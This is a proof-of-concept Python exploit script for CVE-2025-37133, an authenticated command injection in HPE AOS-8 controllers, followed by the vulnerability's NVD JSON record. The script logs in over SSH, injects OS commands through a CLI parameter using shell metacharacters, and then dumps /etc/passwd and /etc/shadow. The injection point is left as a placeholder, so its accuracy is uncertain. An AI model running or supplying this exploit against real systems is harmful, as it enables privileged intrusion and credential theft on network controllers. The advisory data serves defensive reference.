CVE-2025-37133

# CVE-2025-37133 - HPE AOS-8 CLI Command Injection PoC # This PoC demonstrates the authenticated command injection vulnerability # in the CLI binary of AOS-8 Controller/Mobility Conductor import paramiko import sys import time def exploit(target_host, port, username, password, cmd_payload): """ Exploit CVE-2025-37133 - Authenticated Command Injection in AOS-8 CLI Args: target_host: IP address of the AOS-8 controller port: SSH port (default: 22) username: Valid admin/operator username password: Valid password for the user cmd_payload: OS command to inject through the vulnerable CLI parameter """ client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: # Step 1: Authenticate to the AOS-8 controller via SSH print(f"[*] Connecting to {target_host}:{port}...") client.connect(target_host, port=port, username=username, password=password, timeout=10) print("[+] Authentication successful") # Step 2: Open interactive shell session shell = client.invoke_shell() time.sleep(2) # Step 3: Wait for CLI prompt output = shell.recv(65535).decode('utf-8', errors='ignore') print(f"[*] Received prompt: {output[-100:]}") # Step 4: Inject malicious command via vulnerable CLI parameter # The injection uses shell metacharacters to break out of the intended command # and execute arbitrary OS commands as privileged user injected_cmd = f"show command <vulnerable_param> ; {cmd_payload}\n" print(f"[*] Sending injected command: {injected_cmd.strip()}") shell.send(injected_cmd) time.sleep(3) # Step 5: Read the output of the injected command output = shell.recv(65535).decode('utf-8', errors='ignore') print(f"[+] Command output:\n{output}") # Step 6: Execute post-exploitation commands post_cmds = [ "cat /etc/passwd", "whoami", "id", "cat /etc/shadow" ] for cmd in post_cmds: shell.send(f"{cmd}\n") time.sleep(1) output = shell.recv(65535).decode('utf-8', errors='ignore') print(f"[+] {cmd}: {output.strip()}") shell.close() client.close() return True except paramiko.AuthenticationException: print("[-] Authentication failed - valid credentials required") return False except Exception as e: print(f"[-] Exploitation failed: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: {sys.argv[0]} <target> <port> <username> <password> [cmd]") print(f"Example: {sys.argv[0]} 192.168.1.1 22 admin password123 'id'") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) username = sys.argv[3] password = sys.argv[4] payload = sys.argv[5] if len(sys.argv) > 5 else "id" exploit(target, port, username, password, payload)

{"cve": {"id": "CVE-2025-37133", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:39.873", "lastModified": "2025-11-12T16:33:35.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authenticated command injection vulnerability exists in the CLI binary of an AOS-8 Controller/Mobility Conductor operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}